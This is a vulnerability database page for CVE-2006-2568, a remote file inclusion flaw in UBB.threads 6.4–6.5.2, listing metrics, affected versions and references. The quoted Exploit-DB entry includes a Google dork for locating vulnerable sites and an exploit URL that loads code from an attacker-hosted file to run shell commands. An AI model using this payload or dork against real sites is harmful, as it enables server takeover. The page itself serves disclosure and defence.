CVE-2006-2568 : Detail

CVE-2006-2568

12.81%V3
Network
2006-05-24
21h00 +00:00
2017-10-18
14h57 +00:00
Notifications for a CVE
Stay informed of any changes for a specific CVE.
Notifications manage

CVE Descriptions

PHP remote file inclusion vulnerability in addpost_newpoll.php in UBB.threads 6.4 through 6.5.2 and 6.5.1.1 (trial) allows remote attackers to execute arbitrary PHP code via a URL in the thispath parameter.

CVE Informations

Metrics

Metrics Score Severity CVSS Vector Source
V2 5.1 AV:N/AC:H/Au:N/C:P/I:P/A:P [email protected]

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

Exploit information

Exploit Database EDB-ID : 1814

Publication date : 2006-05-21 22h00 +00:00
Author : V4mu
EDB Verified : Yes

Anomaly 1n The System presents UBB.threads >= 6.4.x Remote File Inclusion founded by V4mu in 04/20/2006 URL: http://www.ubbcentral.com Google dork: allinurl:"/ubbthreads/" exploit: /addpost_newpoll.php?addpoll=preview&thispath=http://[attacker]/cmd.gif?&cmd=id contact: irc.gigachat.net #A1TS # milw0rm.com [2006-05-22]

Products Mentioned

Configuraton 0

Ubbcentral>>Ubb.threads >> Version 6.4

    Ubbcentral>>Ubb.threads >> Version 6.4.1

    Ubbcentral>>Ubb.threads >> Version 6.4.2

    Ubbcentral>>Ubb.threads >> Version 6.4.3

    Ubbcentral>>Ubb.threads >> Version 6.4.4

    Ubbcentral>>Ubb.threads >> Version 6.5

      Ubbcentral>>Ubb.threads >> Version 6.5.1

      Ubbcentral>>Ubb.threads >> Version 6.5.1.1

      Ubbcentral>>Ubb.threads >> Version 6.5.2

        References

        http://secunia.com/advisories/20242
        Tags : third-party-advisory, x_refsource_SECUNIA
        http://www.vupen.com/english/advisories/2006/1915
        Tags : vdb-entry, x_refsource_VUPEN
        http://www.securityfocus.com/bid/18075
        Tags : vdb-entry, x_refsource_BID
        https://www.exploit-db.com/exploits/1814
        Tags : exploit, x_refsource_EXPLOIT-DB
        http://www.osvdb.org/25714
        Tags : vdb-entry, x_refsource_OSVDB